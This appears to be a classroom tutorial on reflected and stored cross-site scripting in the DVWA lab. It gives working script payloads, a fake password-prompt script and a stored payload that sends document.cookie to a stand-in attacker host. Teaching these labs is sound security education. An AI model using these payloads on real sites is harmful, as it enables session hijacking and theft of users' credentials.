XSS = Cross-Site Scripting using DVWA

XSS = Cross-Site Scripting using DVWA

It allows an attacker to inject JavaScript into a web page so that it runs in another user’s browser.

DVWA has two XSS labs:

  1. Reflected XSS
  2. Stored XSS

We’ll do both step-by-step so you can demonstrate in class.

1. Setup DVWA

Open:

http://localhost/dvwa

Login → go to DVWA Security
Set:

Security level = Low

PART A — Reflected XSS

Go to:

DVWA → XSS (Reflected)

You’ll see:

Enter your name:

This page reflects input directly into HTML without sanitizing.

Basic XSS test

Enter:

<script>alert('XSS')</script>

Click submit.

You’ll see:

alert popup

Explain to students:

The website printed our script directly into the page, so the browser executed it.

Steal cookie demo

Enter:

<script>alert(document.cookie)</script>

It shows session cookie.

Explain:

If attacker gets this cookie → they can hijack login session.

Fake login popup (impact demo)

<script>
var p = prompt("Enter password");
alert("Password captured: " + p);
</script>

Shows how attackers trick users.

Why it worked

Backend prints input like:

echo "Hello " . $_GET['name'];

No filtering → script executes.

PART B — Stored XSS

Go to:

DVWA → XSS (Stored)

This is more dangerous.

It stores script in database and runs for every user.

Attack

In message field enter:

<script>alert('Stored XSS')</script>

Submit.

Now refresh page → popup appears automatically.

Explain:

Script is saved in database.
Every visitor gets attacked.

Cookie stealing example

Enter:

<script>
fetch("http://attacker.com/steal?c="+document.cookie);
</script>\

Leave a Reply

Your email address will not be published. Required fields are marked *